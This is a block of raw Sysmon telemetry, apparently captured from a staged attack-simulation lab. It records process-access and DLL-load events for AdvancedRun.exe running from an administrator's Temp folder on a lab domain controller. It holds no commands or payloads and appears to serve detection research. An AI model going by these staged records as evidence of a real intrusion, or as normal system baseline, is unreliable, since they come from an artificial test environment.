17:11:37.492{834264DD-DB11-61EA-9500-000000002702}4284528C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928854Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.492{834264DD-DB11-61EA-9500-000000002702}4284528C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928853Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.492{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928852Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.492{834264DD-DB11-61EA-9500-000000002702}4284528C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928851Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.475{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928850Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.459{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928849Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.475{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928848Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.459{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928847Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.459{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003928846Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.459{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000003928841Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.349{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928840Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.334{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928839Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.272{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928838Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.272{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928837Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.272{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928836Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.272{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003928835Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.272{834264DD-DAE7-61EA-1700-000000002702}13002324C:\Windows\System32\svchost.exe{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000003928834Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.272{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003928833Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.272{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003928832Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.272{834264DD-DAE4-61EA-0C00-000000002702}652696C:\Windows\system32\lsass.exe{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000003928831Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928830Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928829Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928828Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928827Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928826Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928825Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928824Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928823Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928822Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928821Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928820Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928819Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928818Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928817Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928816Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928815Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928814Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928813Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003928812Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:11:37.256{834264DD-E949-61EA-C602-000000002702}108C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 